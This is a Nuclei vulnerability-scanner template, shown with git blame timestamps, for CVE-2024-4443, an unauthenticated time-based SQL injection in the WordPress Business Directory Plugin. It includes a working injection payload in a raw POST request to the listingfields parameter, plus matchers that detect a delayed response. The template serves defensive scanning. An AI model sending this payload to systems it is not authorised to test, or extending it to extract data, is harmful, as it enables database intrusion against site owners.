nuclei-templates/http/cves/2024/CVE-2024-4443.yaml

44 lines
2.0 KiB
YAML
Raw Normal View History

2024-06-15 15:35:37 +00:00
id: CVE-2024-4443
info:
2024-06-25 07:56:19 +00:00
name: Business Directory Plugin <= 6.4.2 - SQL Injection
2024-06-15 15:35:37 +00:00
author: securityforeveryone
severity: critical
description: |
2024-06-24 08:43:31 +00:00
The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
impact: |
Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
2024-06-25 07:56:19 +00:00
remediation: |
Fixed in 6.4.3.
2024-06-15 15:35:37 +00:00
reference:
- https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/fields/class-fieldtypes-select.php#L110
- https://plugins.trac.wordpress.org/changeset/3089626/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/982fb304-08d6-4195-97a3-f18e94295492?source=cve
2024-06-25 07:56:19 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-4443
2024-06-15 15:35:37 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4443
epss-score: 0.00063
epss-percentile: 0.27036
2024-06-24 08:43:31 +00:00
metadata:
verified: true
2024-06-25 07:56:19 +00:00
max-request: 1
2024-06-24 08:43:31 +00:00
publicwww-query: "/wp-content/plugins/business-directory-plugin/"
tags: cve,cve2024,sqli,business-directory,wordpress,wp-plugin
2024-06-15 15:35:37 +00:00
http:
2024-06-24 08:43:31 +00:00
- raw:
- |
@timeout: 20s
POST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1
Host: {{Hostname}}
2024-06-15 15:35:37 +00:00
matchers:
- type: dsl
dsl:
2024-06-24 08:43:31 +00:00
- 'duration>=6'
2024-06-15 15:35:37 +00:00
- 'status_code == 200'
- 'contains_all(body,"Business Directory","No listings found")'
condition: and
# digest: 4b0a00483046022100e04251201f1f578148c87851a0d69f7f4eee73c7f9d22c66c87ac3844b5cd1d8022100f7ca58462cb7d8fb264834a0e6477dc1cf7a0160dd2356e11573da802e5455ca:922c64590222798bb761d5b6d8e72950